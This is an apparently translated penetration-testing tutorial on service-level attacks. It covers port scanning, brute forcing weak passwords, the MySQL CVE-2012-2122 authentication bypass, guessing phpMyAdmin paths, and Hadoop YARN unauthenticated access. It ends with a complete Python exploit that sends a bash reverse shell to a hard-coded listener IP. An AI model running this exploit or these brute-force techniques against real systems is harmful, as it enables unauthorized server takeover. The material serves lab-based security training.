Table of contents

1. Security issues of service applications

1. Improper configuration - unauthorized access

2. Security Mechanism - Specific Security Vulnerabilities

3. Security mechanism - weak password blasting attack

2. Security testing ideas for service applications

1. Determine whether the service is open

2. Determine the type of service

3. Determine the method of use

3. Mysql-Unauthorized Access-CVE-2012-2122 Exploitation

1. Vulnerability overview

2. Vulnerability recurrence

3. Supplementary knowledge points

4. Hadoop-unauthorized access-built-in cooperation command to execute RCE

1. Introduction to Hadoop

2. Vulnerability recurrence

1. Security issues of service applications

1. Improper configuration - unauthorized access

When the other party builds the service application, the default configuration is used, or some security configurations are modified by themselves, which leads to improper configuration and some security problems.

One of the most common is unauthorized access due to improper configuration.

2. Security Mechanism - Specific Security Vulnerabilities

Unauthorized access is generally caused by improper configuration, that is to say, there is no problem with the software itself, and the security mechanism is mainly a problem with the software or application service itself, which has nothing to do with the configuration.

3. Security mechanism - weak password blasting attack

Some services use password verification to judge whether the service is started or disabled. For example, there are some users in the database built in the database, including account numbers and passwords. If the set account number and password are too simple, then the attacker You can get the account number and password by guessing weak passwords and then enter to conduct some security tests.

2. Security testing ideas for service applications

1. Determine whether the service is open

Because we are talking about the security issue of the service, that is to say, if the current service does not exist, then the security issue of the current service will definitely not exist, and there is no need to continue testing.

port scan

Tools such as nmap can be used. The principle is that if the service wants to be opened, a corresponding port needs to be opened. Most of these ports are default, which means that it can be judged whether a service is open based on the port number. For example, the default port number of mysql database is 3306; the default port number of Oracle database is 1521; the default port number of sql server database is 1433; the default port number of Redis database is 6379.

Of course, the user can also modify the port number, but generally it will not be modified.

But there is a special case, the service is clearly open, but the port is not open, why?

Three reasons:

(1) It is in the intranet (the main reason).

Because its services are placed on the intranet host, many services (ports) are opened in the intranet, such as web and database, but it only maps the web to the external network, so we can only see that its services are on the external network It is enabled, but when scanning, we only scan the networking host, and the networking host will forward the data to the intranet for processing, so we cannot detect the opening of the corresponding service port.

(2) The port is modified (less likely).

(3) Protection against interference from applications.

Combination Guess

That is, we need to know that, for example, if there is service A, there is a high possibility that there will be service B.

Information Sources

There are some services that will return some error reports or prompts during our security tests, and then we can know that there are certain services based on this.

2. Determine the type of service

Determine what services exist based on the service type, and then determine what security problems may exist and how to take advantage of the existing security problems.

database
file transfer
remote control

For example, the remote desktop protocol (RDP) used to remotely connect to the Windows system uses TCP port 3389. The Linux system can use the SSH (Secure Shell) protocol for remote access and control, and the TCP port used is 22. When connecting, you need to enter the correct account number and password. This is the key point in this process. If you get the account number and password, the attacker can connect directly, which is equivalent to taking down the server. Attackers can use password blasting to attack.

data communication

3. Determine the method of use

It is to use the existing services and service types we judged earlier to determine how to use possible security issues to proceed to the next step.

Feature Vulnerabilities

Use it according to the security problems of the service itself.

unauthorized access

The other party's configuration of the service application is improper, and there may be unauthorized access.

Weak password blasting

When it comes to account passwords, you can use account password blasting to guess.

3. Mysql-Unauthorized Access-CVE-2012-2122 Exploitation

1. Vulnerability overview

Affected version:
- MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
- MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.
Vulnerability description:

When connecting to MariaDB/MySQL, the entered password is compared with the expected correct password. Due to incorrect handling, even if memcmp() returns a non-zero value, MySQL will think that the two passwords are the same. That is to say, as long as you know the user name, you can log in to the SQL database directly if you keep trying. According to the announcement, about 256 times can be fooled once.

2. Vulnerability recurrence

Start the environment first.

Find a scanning interface on the Internet to scan the open ports of the environment, and enter the ip in the position shown in the figure below.

The probe results are shown in the figure below. You can see that port 3306 is open, so we can know that the mysql service exists.

Next, we will judge whether the vulnerability written above exists, just execute the following command.

After executing the command shown in the figure above, the effect is shown in the figure below. You can see that because the password is wrong, the error is reported all the time, but at a certain moment, the error is not reported again, but directly entered into the database.

3. Supplementary knowledge points

The default configuration of mysql can only log in to the root user locally, and the remote connection request is rejected, so we can't perform password blasting on it, because we can't even connect.

Therefore, we can only use something like phpMyAdmin to guess, because it belongs to a third-party database management application, which is built on the other party's server, so we can use it to log in to the database. At this time, the data is sent from local to local , so it is possible to test.

So how to judge whether phpMyAdmin exists on the website? You can use a browser to visit the website and try to enter the following content in the URL address bar (you can also use the directory scanning tool to scan directly to see if there are relevant paths):

/phpmyadmin
/pma
/myadmin
/mysql

If you see the login page for phpMyAdmin, there is a good chance that phpMyAdmin exists for the site and you can log in with the default login credentials.

If you see a 404 error page, then phpMyAdmin probably doesn't exist for the site, or it has been moved to a different location.

Note, however, that even if one of the above URLs is not visible, the possibility of phpMyAdmin being present on the site cannot be completely ruled out. Administrators may have renamed or moved phpMyAdmin to a different location to avoid detection, so additional security checks need to be performed when evaluating the security of a website.

4. Hadoop-unauthorized access-built-in cooperation command to execute RCE

1. Introduction to Hadoop

Hadoop is an open source distributed computing platform for processing large-scale data sets. It provides distributed storage and distributed processing capabilities, and can perform efficient data processing on large-scale server clusters.

It is usually used to process large-scale data sets, such as data analysis, data mining, machine learning and other application scenarios. Its design philosophy is to achieve efficient data processing by splitting large-scale data into multiple data blocks and processing these data blocks in parallel on multiple computing nodes.

Commonly used port configurations are as follows (we usually mainly look at port 50010):

2. Vulnerability recurrence

Once in the range, select "Hadoop" in the database options.

Start the environment.

Go to the address provided by the range.

Visit the /cluster/apps page: (The existence of this page indicates that there is an unauthorized access vulnerability).

Use the following official exp to reverse the shell.

#!/usr/bin/env python

import requests

target = 'http://123.58.236.76:31367/' # 将这里更改为目标主机地址，监听端口为9999
lhost = '47.94.236.117' # 输入你的ip地址（外网反弹地址）在这里，是用来接收shell的回连地址，监听端口为9999

url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)

Create a py file on the desktop to save the above exp.